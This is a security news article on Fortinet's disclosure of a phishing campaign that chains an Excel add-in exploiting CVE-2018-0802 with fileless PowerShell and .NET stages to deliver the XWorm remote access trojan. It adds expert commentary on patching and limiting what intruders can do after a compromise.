Fortinet researchers have disclosed a new phishing campaign delivering the commercially available XWorm malware, chaining a years-old Microsoft Office vulnerability with fileless execution to escape detection.
The campaign, which uses multi-themed phishing emails and a malicious Excel add-in, ultimately deploys the modular remote access trojan (RAT) capable of encrypted command-and control (C2) and plugin-based expansion.
“This campaign is striking in its ordinariness,” said Shane Barney, chief information security officer at Keeper Security. “There’s no breakthrough technique here. It’s a clean execution chain built from components we’ve all seen before. The sophistication isn’t in the novelty, it’s in the assembly.”
Attackers used a phishing email carrying a malicious Excel add-in that exploits CVE-2018-0802, a memory corruption flaw in Office patched in 2018. The attack then continues into HTA and PowerShell-based execution to load additional components of the attack.
Attackers used a familiar entry point
According to a Fortinet blog post, the campaign relies on business-themed phishing lures and the legacy remote code execution vulnerability in the Microsoft Equation Editor that defenders have known for years. Fortinet noted that the continued success of CVE-2018-0802 suggests patching gaps remain a viable attack surface.
Jason Soroko, senior fellow at Sectigo, said the pairing of routine phishing with modern backend tradecraft is what makes the campaign notable.
“What stands out here is how ‘old’ and ‘routine’ the front end is, and how modern the back end remains,” he said. “The lure is a familiar business pretexting and a malicious Excel add-in, but the real signal is the attacker’s confidence that legacy Office exploit paths still convert at scale. The attachment abuses CVE-2018-0802, then pivots quickly into HTA plus PowerShell to keep the heavy lifting off disk.”
Fortinet researchers added that the remote code privileges gained through CVE-2018-0802 further allow execution of HTA and PowerShell components, keeping much of the activity off disk. “That combination is a reminder that patch hygiene and macro or script execution policy are still doing more real work than most organizations want to admit,” Soroko added.
Fileless .NET stage and a modular XWorm core
Beyond initial access, Fortinet observed a fileless .NET stage loaded directly into memory, followed by process hollowing into msbuild.exe, a legitimate Microsoft build tool capable of executing .NET code. The choice of msbuild.exe aligns with the malware’s runtime requirements while helping it blend into normal system activity.
“A fileless .NET stage loaded in memory, followed by process hollowing into msbuild.exe, is a clean ‘blend in’ move that leverages a legitimate .NET-capable binary and complicates attribution for simplistic detections,” Soroko said. “Fortinet’s rationale for msbuild.exe is especially useful for defenders because it ties the LOLBin choice to the malware’s .NET runtime needs, not just generic masquerading.”
Once active, XWorm communicates with its C2 using an AES-encrypted packet, which supports a broad plugin ecosystem. That modularity, the researchers noted, expands its capabilities beyond remote access, enabling credential theft, data exfiltration, disruption, and modernization paths depending on what the operator wants.
Fortinet said XWorm supports a wide range of operator commands, including system control (CLOSE, uninstall, update), file download and execution (DW, LN), plugin loading, screenshot capture ($Cap), keylogger retrieval, DDoS control, and shutdown or restart functions. The disclosure also listed indicators of compromise tied to the campaign, including phishing URLs and domains used to host HTA and loader files, the C2 server, file hashes for the malicious Excel attachment, and the final XWorm payload.
Barney emphasized that the broader risk hinges less on the malware label and more on post-compromise controls. “Campaigns like this expose a simple reality: the entry vector is predictable. The tooling is commoditized. The only real variable is whether the environment limits what an intruder can do next,” he said.
No Responses